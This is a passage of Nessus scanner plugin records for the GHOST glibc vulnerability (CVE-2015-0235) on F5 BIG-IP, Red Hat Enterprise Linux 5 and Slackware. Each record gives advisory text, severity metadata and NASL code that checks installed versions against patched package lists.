A remote attacker may be able to use this flaw to execute arbitrary code.(CVE-2015-0235)\n\nImpact\n\nA remote attacker may be able to execute arbitrary code.", "modified": "2019-01-04T00:00:00", "id": "F5_BIGIP_SOL16057.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=86009", "published": "2015-09-18T00:00:00", "title": "F5 Networks BIG-IP : GHOST: glibc gethostbyname buffer overflow vulnerability (K16057) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K16057.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86009);\n script_version(\"2.10\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n\n script_name(english:\"F5 Networks BIG-IP : GHOST: glibc gethostbyname buffer overflow vulnerability (K16057) (GHOST)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. 
A remote\nattacker may be able to use this flaw to execute arbitrary\ncode.(CVE-2015-0235)\n\nImpact\n\nA remote attacker may be able to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K16057\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K16057.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K16057\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.4.0-11.5.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# LC\nvmatrix[\"LC\"] = 
make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.1.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.1HF14\",\"10.2.4HF11\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.1HF14\",\"10.2.4HF11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:23", "bulletinFamily": "scanner", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81033", "published": "2015-01-28T00:00:00", "title": "RHEL 5 : glibc (RHSA-2015:0090) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0090. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81033);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/10 11:49:54\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2015:0090) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0090\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-debuginfo-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:24", "bulletinFamily": "scanner", "description": "New glibc packages are available for Slackware 13.0, 13.1, 13.37, 14.0, and 14.1 to fix a security issue.", "modified": "2016-05-19T00:00:00", "id": "SLACKWARE_SSA_2015-028-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81075", "published": "2015-01-29T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : glibc (SSA:2015-028-01) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-028-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81075);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2016/05/19 18:02:18 $\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"SSA\", value:\"2015-028-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : glibc (SSA:2015-028-01) (GHOST)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New glibc packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, and 14.1 to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.1260924\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ccc24009\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:slackware:slackware_linux:glibc-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-solibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-zoneinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif 
(\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-i18n\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-profile\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-solibs\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-i18n\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-profile\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-solibs\", pkgver:\"2.11.1\", pkgarch:\"i486\", 
pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-i18n\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-profile\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-solibs\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.13\", pkgarch:\"x86_64\", 